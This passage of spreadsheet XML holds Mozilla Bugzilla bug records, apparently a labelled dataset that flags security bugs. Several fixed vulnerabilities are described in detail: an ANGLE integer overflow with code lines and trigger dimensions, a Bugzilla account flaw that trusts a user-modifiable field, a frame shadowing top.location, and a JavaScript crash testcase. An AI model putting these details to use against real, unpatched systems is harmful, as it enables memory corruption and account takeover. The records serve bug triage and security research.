          <t>2000-06-28 13:47:26 -0700</t>
        </is>
      </c>
      <c r="C1815" t="inlineStr">
        <is>
          <t>bugzilla helper contains invalied component of "other"</t>
        </is>
      </c>
      <c r="D1815" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E1815" t="n">
        <v>1</v>
      </c>
      <c r="F1815" t="n">
        <v>1</v>
      </c>
      <c r="G1815" t="n">
        <v>4</v>
      </c>
      <c r="H1815" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1815" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1815" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1815" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1815" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1815" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1815" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1815" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1815" t="inlineStr"/>
      <c r="Q1815" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1815" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1815" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T1815" t="n">
        <v>1</v>
      </c>
      <c r="U1815" t="n">
        <v>0</v>
      </c>
      <c r="V1815" t="n">
        <v>9</v>
      </c>
      <c r="W1815" t="inlineStr">
        <is>
          <t>The bugzilla helper contains an invalid "other" component for the Browser
product.  If a user selects this, he/she gets a "database corruption" error spit
back at him.  
The right fix is presumably for the helper to be integrated with Bugzilla and
get its component list from the database directly.  But for the moment, at
least, just removing the "other" from the helper would be fine.</t>
        </is>
      </c>
      <c r="X1815" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1816">
      <c r="A1816" t="n">
        <v>1237577</v>
      </c>
      <c r="B1816" t="inlineStr">
        <is>
          <t>2016-01-07 04:09:23 -0800</t>
        </is>
      </c>
      <c r="C1816" t="inlineStr">
        <is>
          <t>Replacing RaptureXML/SWXMLHash with a library that is a Carthage compliant, actively maintained Swift project</t>
        </is>
      </c>
      <c r="D1816" t="inlineStr">
        <is>
          <t>2016-10-20 10:37:14 -0700</t>
        </is>
      </c>
      <c r="E1816" t="n">
        <v>1</v>
      </c>
      <c r="F1816" t="n">
        <v>1</v>
      </c>
      <c r="G1816" t="n">
        <v>2</v>
      </c>
      <c r="H1816" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1816" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1816" t="inlineStr">
        <is>
          <t>Build &amp; Test</t>
        </is>
      </c>
      <c r="K1816" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1816" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1816" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1816" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1816" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1816" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q1816" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1816" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1816" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1816" t="n">
        <v>1</v>
      </c>
      <c r="U1816" t="n">
        <v>0</v>
      </c>
      <c r="V1816" t="n">
        <v>17</v>
      </c>
      <c r="W1816" t="inlineStr">
        <is>
          <t>Code that currently uses RaptureXML should be moved to use SWXMLHash. This is because RaptureXML is not a supported project, we don't need 2 different xml parsing libraries in the app and Rapture is also no carthage compliant.</t>
        </is>
      </c>
      <c r="X1816" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1817">
      <c r="A1817" t="n">
        <v>1823077</v>
      </c>
      <c r="B1817" t="inlineStr">
        <is>
          <t>2023-03-17 10:46:29 -0700</t>
        </is>
      </c>
      <c r="C1817" t="inlineStr">
        <is>
          <t>Save file containing environment variables in "Save Link As" on Firefox 111 Windows</t>
        </is>
      </c>
      <c r="D1817" t="inlineStr">
        <is>
          <t>2024-05-30 11:07:05 -0700</t>
        </is>
      </c>
      <c r="E1817" t="n">
        <v>1</v>
      </c>
      <c r="F1817" t="n">
        <v>1</v>
      </c>
      <c r="G1817" t="n">
        <v>2</v>
      </c>
      <c r="H1817" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1817" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1817" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1817" t="inlineStr">
        <is>
          <t>Firefox 111</t>
        </is>
      </c>
      <c r="L1817" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M1817" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N1817" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1817" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1817" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main112+][adv-esr102.10+]</t>
        </is>
      </c>
      <c r="Q1817" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1817" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1817" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T1817" t="n">
        <v>1</v>
      </c>
      <c r="U1817" t="n">
        <v>0</v>
      </c>
      <c r="V1817" t="n">
        <v>16</v>
      </c>
      <c r="W1817" t="inlineStr">
        <is>
          <t>Created attachment 9323693
test.html
Not sure if you noticed but its still possible to save files containing %% when using "Save Link As" on Firefox 111.0 -- https://www.mozilla.org/en-US/security/advisories/mfsa2023-09/#CVE-2023-28163
STR
1. Right click Save Link As on this document.</t>
        </is>
      </c>
      <c r="X1817" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1818">
      <c r="A1818" t="n">
        <v>689385</v>
      </c>
      <c r="B1818" t="inlineStr">
        <is>
          <t>2011-09-26 16:58:56 -0700</t>
        </is>
      </c>
      <c r="C1818" t="inlineStr">
        <is>
          <t>Make Search Activity ratings based on current average</t>
        </is>
      </c>
      <c r="D1818" t="inlineStr">
        <is>
          <t>2014-09-24 06:39:12 -0700</t>
        </is>
      </c>
      <c r="E1818" t="n">
        <v>1</v>
      </c>
      <c r="F1818" t="n">
        <v>1</v>
      </c>
      <c r="G1818" t="n">
        <v>6</v>
      </c>
      <c r="H1818" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1818" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J1818" t="inlineStr">
        <is>
          <t>Add-on Builder</t>
        </is>
      </c>
      <c r="K1818" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1818" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1818" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1818" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1818" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1818" t="inlineStr"/>
      <c r="Q1818" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1818" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1818" t="inlineStr">
        <is>
          <t>Builder 0.9.13</t>
        </is>
      </c>
      <c r="T1818" t="n">
        <v>1</v>
      </c>
      <c r="U1818" t="n">
        <v>0</v>
      </c>
      <c r="V1818" t="n">
        <v>12</v>
      </c>
      <c r="W1818" t="inlineStr">
        <is>
          <t>We should determine the current average activity rating for all the Packages on the site, and use that as the starting place for determining what is Stale, Low, Medium, etc.
The average rating can be stored in memcached, and only calculated once it's expired.</t>
        </is>
      </c>
      <c r="X1818" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1819">
      <c r="A1819" t="n">
        <v>792405</v>
      </c>
      <c r="B1819" t="inlineStr">
        <is>
          <t>2012-09-19 07:07:15 -0700</t>
        </is>
      </c>
      <c r="C1819" t="inlineStr">
        <is>
          <t>Frames can shadow |top|</t>
        </is>
      </c>
      <c r="D1819" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:18 -0700</t>
        </is>
      </c>
      <c r="E1819" t="n">
        <v>1</v>
      </c>
      <c r="F1819" t="n">
        <v>1</v>
      </c>
      <c r="G1819" t="n">
        <v>3</v>
      </c>
      <c r="H1819" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1819" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1819" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1819" t="inlineStr">
        <is>
          <t>15 Branch</t>
        </is>
      </c>
      <c r="L1819" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1819" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1819" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1819" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1819" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q1819" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1819" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1819" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T1819" t="n">
        <v>1</v>
      </c>
      <c r="U1819" t="n">
        <v>0</v>
      </c>
      <c r="V1819" t="n">
        <v>21</v>
      </c>
      <c r="W1819" t="inlineStr">
        <is>
          <t>Created attachment 662540
shadow top.location with a frame -- PoC
It is possible to shadow |top| with a frame whose name attribute's value is set to "top". As a result, plugins accessing top.location, such as Adobe Flash Player, may read an arbitrary URL.
The fix to bug 765527 doesn't seem to cover this case.</t>
        </is>
      </c>
      <c r="X1819" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1820">
      <c r="A1820" t="n">
        <v>1188010</v>
      </c>
      <c r="B1820" t="inlineStr">
        <is>
          <t>2015-07-27 10:30:38 -0700</t>
        </is>
      </c>
      <c r="C1820" t="inlineStr">
        <is>
          <t>Overflow in TextureStorage11::setData can cause memory-safety bug</t>
        </is>
      </c>
      <c r="D1820" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:43 -0700</t>
        </is>
      </c>
      <c r="E1820" t="n">
        <v>1</v>
      </c>
      <c r="F1820" t="n">
        <v>1</v>
      </c>
      <c r="G1820" t="n">
        <v>3</v>
      </c>
      <c r="H1820" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1820" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1820" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1820" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L1820" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1820" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1820" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1820" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1820" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q1820" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1820" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1820" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T1820" t="n">
        <v>1</v>
      </c>
      <c r="U1820" t="n">
        <v>0</v>
      </c>
      <c r="V1820" t="n">
        <v>38</v>
      </c>
      <c r="W1820" t="inlineStr">
        <is>
          <t>TextureStorage11::setData (gfx\angle\src\libGLESv2\renderer\d3d\d3d11\TextureStorage11.cpp) can experience an overflow if its caller specifies a destBox or image argument with unusually-large dimensions. On overflow, setData allocates a buffer that is far too small, then loads an image into it, thus writing memory it does not own.
It is unclear whether checks elsewhere that limit the size of images, such as those in WebGL2Content::TexImage3D (dom\canvas\WebGL2ContentTextures.cpp), make TextureStorage11::setData safe in practice. In any case, it is safer for each function or object to protect itself from insecure operation than for a function in a deeper layer to rely upon checks made by a function closer to the security perimeter.
Details: Using ints and UINTs, setData computes the quantity:
   outputPixelSize * width * height * depth
where outputPixelSize is the number of bytes per pixel (probably always 4), and width, height, and depth are derived from either the destBox argument (if specified) or else the |image| argument:
461: gl::Error TextureStorage11::setData(const gl::ImageIndex &amp;index, Image *image, const gl::Box *destBox, GLenum type,
462:                                     const gl::PixelUnpackState &amp;unpack, const uint8_t *pixelData)
...
485:     int width = destBox ? destBox-&gt;width : static_cast&lt;int&gt;(image-&gt;getWidth());
486:     int height = destBox ? destBox-&gt;height : static_cast&lt;int&gt;(image-&gt;getHeight());
487:     int depth = destBox ? destBox-&gt;depth : static_cast&lt;int&gt;(image-&gt;getDepth());
488:     UINT srcRowPitch = internalFormatInfo.computeRowPitch(type, width, unpack.alignment);
489:     UINT srcDepthPitch = internalFormatInfo.computeDepthPitch(type, width, height, unpack.alignment);
490: 
491:     const d3d11::TextureFormat &amp;d3d11Format = d3d11::GetTextureFormatInfo(image-&gt;getInternalFormat());
492:     const d3d11::DXGIFormat &amp;dxgiFormatInfo = d3d11::GetDXGIFormatInfo(d3d11Format.texFormat);
493:
494:     size_t outputPixelSize = dxgiFormatInfo.pixelBytes;
495: 
496:     UINT bufferRowPitch = outputPixelSize * width;
497:     UINT bufferDepthPitch = bufferRowPitch * height;
498: 
499:     MemoryBuffer conversionBuffer;
500:     if (!conversionBuffer.resize(bufferDepthPitch * depth))
501:     {
502:         return gl::Error(GL_OUT_OF_MEMORY, "Failed to allocate internal buffer.");
503:     }
503: 
505:     // TODO: fast path
506:     LoadImageFunction loadFunction = d3d11Format.loadFunctions.at(type);
507:     loadFunction(width, height, depth,
508:                  pixelData, srcRowPitch, srcDepthPitch,
509:                  conversionBuffer.data(), bufferRowPitch, bufferDepthPitch);
...
Thus, a 3D image as small as 1024x1024x1025x32bpp or a 2D image as small as 32768x32769x32bpp could cause an overflow.</t>
        </is>
      </c>
      <c r="X1820" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1821">
      <c r="A1821" t="n">
        <v>670868</v>
      </c>
      <c r="B1821" t="inlineStr">
        <is>
          <t>2011-07-12 00:29:25 -0700</t>
        </is>
      </c>
      <c r="C1821" t="inlineStr">
        <is>
          <t>[SECURITY] Account preferences page trusts user-modifiable field for obtaining current e-mail address</t>
        </is>
      </c>
      <c r="D1821" t="inlineStr">
        <is>
          <t>2011-08-05 17:33:30 -0700</t>
        </is>
      </c>
      <c r="E1821" t="n">
        <v>1</v>
      </c>
      <c r="F1821" t="n">
        <v>1</v>
      </c>
      <c r="G1821" t="n">
        <v>4</v>
      </c>
      <c r="H1821" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1821" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1821" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K1821" t="inlineStr">
        <is>
          <t>2.16</t>
        </is>
      </c>
      <c r="L1821" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1821" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1821" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1821" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1821" t="inlineStr"/>
      <c r="Q1821" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1821" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1821" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T1821" t="n">
        <v>1</v>
      </c>
      <c r="U1821" t="n">
        <v>0</v>
      </c>
      <c r="V1821" t="n">
        <v>21</v>
      </c>
      <c r="W1821" t="inlineStr">
        <is>
          <t>I noticed this while investigating bug 670669. The 'account' tab under user prefs contains a hidden 'old_email' field. This field can be easily modified by a malicious user to contain some other address besides what is actually used. This prevents the real user from receiving an e-mail address confirmation message, so he/she may not notice that somebody has stolen his/her account.
In userprefs.cgi : SaveAccount(),
88     my $old_login_name = $cgi-&gt;param('old_login');
  ^^ pulled from user content
136             Bugzilla::Token::IssueEmailChangeToken($user, $old_login_name,
137                                                    $new_login_name);
  ^^ trusted as actual previous e-mail address
Instead of trusting user content, should just pull the e-mail address from the user object.</t>
        </is>
      </c>
      <c r="X1821" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1822">
      <c r="A1822" t="n">
        <v>54131</v>
      </c>
      <c r="B1822" t="inlineStr">
        <is>
          <t>2000-09-25 21:44:56 -0700</t>
        </is>
      </c>
      <c r="C1822" t="inlineStr">
        <is>
          <t>NSS tools need to be built with the -z and +s linker options.</t>
        </is>
      </c>
      <c r="D1822" t="inlineStr">
        <is>
          <t>2000-09-25 22:06:48 -0700</t>
        </is>
      </c>
      <c r="E1822" t="n">
        <v>1</v>
      </c>
      <c r="F1822" t="n">
        <v>1</v>
      </c>
      <c r="G1822" t="n">
        <v>3</v>
      </c>
      <c r="H1822" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1822" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1822" t="inlineStr">
        <is>
          <t>Tools</t>
        </is>
      </c>
      <c r="K1822" t="inlineStr">
        <is>
          <t>3.0</t>
        </is>
      </c>
      <c r="L1822" t="inlineStr">
        <is>
          <t>HP</t>
        </is>
      </c>
      <c r="M1822" t="inlineStr">
        <is>
          <t>HP-UX</t>
        </is>
      </c>
      <c r="N1822" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1822" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1822" t="inlineStr"/>
      <c r="Q1822" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1822" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1822" t="inlineStr">
        <is>
          <t>3.0.1</t>
        </is>
      </c>
      <c r="T1822" t="n">
        <v>1</v>
      </c>
      <c r="U1822" t="n">
        <v>0</v>
      </c>
      <c r="V1822" t="n">
        <v>4</v>
      </c>
      <c r="W1822" t="inlineStr">
        <is>
          <t>The HP-UX equivalent of LD_LIBRARY_PATH is SHLIB_PATH.
On HP-UX, an executable program does not use the SHLIB_PATH
environment variable to search for shared libraries at run
time unless it was linked with the +s linker option.  Since
the NSS tools link with NSPR shared libraries, they should
be built with +s enabled.
On HP-UX, by default dereferencing a null pointer succeeds
silently.  To make it a fatal error like on other platforms,
one has to link the executable program with the -z option.</t>
        </is>
      </c>
      <c r="X1822" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1823">
      <c r="A1823" t="n">
        <v>1465420</v>
      </c>
      <c r="B1823" t="inlineStr">
        <is>
          <t>2018-05-30 05:42:09 -0700</t>
        </is>
      </c>
      <c r="C1823" t="inlineStr">
        <is>
          <t>Some intermittent bugs not suggested any more for failures</t>
        </is>
      </c>
      <c r="D1823" t="inlineStr">
        <is>
          <t>2021-12-05 14:50:30 -0800</t>
        </is>
      </c>
      <c r="E1823" t="n">
        <v>1</v>
      </c>
      <c r="F1823" t="n">
        <v>1</v>
      </c>
      <c r="G1823" t="n">
        <v>7</v>
      </c>
      <c r="H1823" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1823" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1823" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1823" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1823" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1823" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1823" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1823" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1823" t="inlineStr"/>
      <c r="Q1823" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1823" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1823" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1823" t="n">
        <v>1</v>
      </c>
      <c r="U1823" t="n">
        <v>0</v>
      </c>
      <c r="V1823" t="n">
        <v>11</v>
      </c>
      <c r="W1823" t="inlineStr">
        <is>
          <t>Trees are closed for this.
e.g. https://treeherder.mozilla.org/#/jobs?repo=autoland&amp;revision=6be2c9f129c9966e7ee1cd489a534754362ac662&amp;filter-resultStatus=testfailed&amp;filter-resultStatus=busted&amp;filter-resultStatus=exception&amp;filter-resultStatus=retry&amp;filter-resultStatus=usercancel&amp;filter-resultStatus=runnable
Should suggest https://bugzilla.mozilla.org/show_bug.cgi?id=1415911 and did so in the past.
https://treeherder.mozilla.org/#/jobs?repo=mozilla-esr60&amp;filter-resultStatus=testfailed&amp;filter-resultStatus=busted&amp;filter-resultStatus=exception&amp;filter-resultStatus=retry&amp;filter-resultStatus=usercancel&amp;filter-resultStatus=runnable&amp;filter-resultStatus=pending&amp;filter-resultStatus=running&amp;selectedJob=180863247 suggests the wrong bug.
All those browser-chrome failures without a suggestion https://treeherder.mozilla.org/#/jobs?repo=mozilla-beta&amp;revision=904b53e0ca0c480d907b71a86f46d3fe721294ab&amp;filter-resultStatus=testfailed&amp;filter-resultStatus=busted&amp;filter-resultStatus=exception&amp;filter-resultStatus=retry&amp;filter-resultStatus=usercancel&amp;filter-resultStatus=runnable also likely have existing bugs.
ghickman made some matcher changes in the today's TH production push: https://github.com/mozilla/treeherder/compare/c80e34213340...bc3e14d6f8ea#files_bucket</t>
        </is>
      </c>
      <c r="X1823" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1824">
      <c r="A1824" t="n">
        <v>1502744</v>
      </c>
      <c r="B1824" t="inlineStr">
        <is>
          <t>2018-10-28 11:51:24 -0700</t>
        </is>
      </c>
      <c r="C1824" t="inlineStr">
        <is>
          <t>Assertion failure: slotInfo.isStackSynced(), at js/src/jit/JSJitFrameIter.cpp:673</t>
        </is>
      </c>
      <c r="D1824" t="inlineStr">
        <is>
          <t>2018-12-18 20:35:33 -0800</t>
        </is>
      </c>
      <c r="E1824" t="n">
        <v>1</v>
      </c>
      <c r="F1824" t="n">
        <v>1</v>
      </c>
      <c r="G1824" t="n">
        <v>3</v>
      </c>
      <c r="H1824" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1824" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1824" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1824" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1824" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1824" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1824" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1824" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1824" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q1824" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1824" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1824" t="inlineStr">
        <is>
          <t>mozilla66</t>
        </is>
      </c>
      <c r="T1824" t="n">
        <v>1</v>
      </c>
      <c r="U1824" t="n">
        <v>0</v>
      </c>
      <c r="V1824" t="n">
        <v>8</v>
      </c>
      <c r="W1824" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 7007206a3cd4 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --ion-offthread-compile=off --ion-eager):
(function(global) {
    global.makeIterator = function makeIterator(overrides) {
        var iterator = {
            return: function(x) {
                return overrides.ret(x);
            }
        };
        return function() {
            return iterator;
        };
    }
})(this);
var iterable = {};
iterable[Symbol.iterator] = makeIterator({
    ret: (function() {
        enableGeckoProfilingWithSlowAssertions();
    })
});
0, [...{} [throwlhs()]] = iterable;
Backtrace:
received signal SIGSEGV, Segmentation fault.
0x000055555628dbac in js::jit::JSJitProfilingFrameIterator::fixBaselineReturnAddress (this=0x7fffffffa1a0) at js/src/jit/JSJitFrameIter.cpp:673
#0  0x000055555628dbac in js::jit::JSJitProfilingFrameIterator::fixBaselineReturnAddress (this=0x7fffffffa1a0) at js/src/jit/JSJitFrameIter.cpp:673
#1  0x0000555555c0a996 in GetTopProfilingJitFrame (act=act@entry=0x7fffffffcce0) at js/src/vm/GeckoProfiler.cpp:79
#2  0x0000555555c16f6c in js::GeckoProfilerRuntime::enable (this=0x7ffff5f1c2f0, enabled=true) at js/src/vm/GeckoProfiler.cpp:141
#3  0x00005555557fc2df in EnableGeckoProfilingWithSlowAssertions (cx=0x7ffff5f18000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/shell/js.cpp:6508
#4  0x000055555596d0e5 in CallJSNative (cx=0x7ffff5f18000, native=0x5555557fc1e0 &lt;EnableGeckoProfilingWithSlowAssertions(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/vm/Interpreter.cpp:468
[...]
#12 0x0000000000000000 in ?? ()
rax	0x0	0
rbx	0x7fffffffa1a0	140737488331168
rcx	0x7ffff6c1c2dd	140737333281501
rdx	0x0	0
rsi	0x7ffff6eeb770	140737336227696
rdi	0x7ffff6eea540	140737336223040
rbp	0x7fffffffa190	140737488331152
rsp	0x7fffffffa160	140737488331104
r8	0x7ffff6eeb770	140737336227696
r9	0x7ffff7fe6cc0	140737354034368
r10	0x58	88
r11	0x7ffff6b927a0	140737332717472
r12	0x7ffff4d91940	140737301256512
r13	0x7ffff49e6d9d	140737297411485
r14	0x1	1
r15	0x7ffff5f7c000	140737320042496
rip	0x55555628dbac &lt;js::jit::JSJitProfilingFrameIterator::fixBaselineReturnAddress()+284&gt;
=&gt; 0x55555628dbac &lt;js::jit::JSJitProfilingFrameIterator::fixBaselineReturnAddress()+284&gt;:	movl   $0x0,0x0
   0x55555628dbb7 &lt;js::jit::JSJitProfilingFrameIterator::fixBaselineReturnAddress()+295&gt;:	ud2</t>
        </is>
      </c>
      <c r="X1824" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1825">
      <c r="A1825" t="n">
        <v>1443092</v>
      </c>
      <c r="B1825" t="inlineStr">
        <is>
          <t>2018-03-05 01:35:11 -0800</t>
        </is>
      </c>
      <c r="C1825" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsIFrame::GetClipPropClipRect</t>
        </is>
      </c>
      <c r="D1825" t="inlineStr">
        <is>
          <t>2024-05-30 09:43:35 -0700</t>
        </is>
      </c>
      <c r="E1825" t="n">
        <v>1</v>
      </c>
      <c r="F1825" t="n">
        <v>1</v>
      </c>
      <c r="G1825" t="n">
        <v>3</v>
      </c>
      <c r="H1825" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1825" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1825" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K1825" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L1825" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1825" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1825" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1825" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1825" t="inlineStr">
        <is>
          <t>[adv-main60+][adv-esr52.8+]</t>
        </is>
      </c>
      <c r="Q1825" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1825" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1825" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T1825" t="n">
        <v>1</v>
      </c>
      <c r="U1825" t="n">
        <v>0</v>
      </c>
      <c r="V1825" t="n">
        <v>34</v>
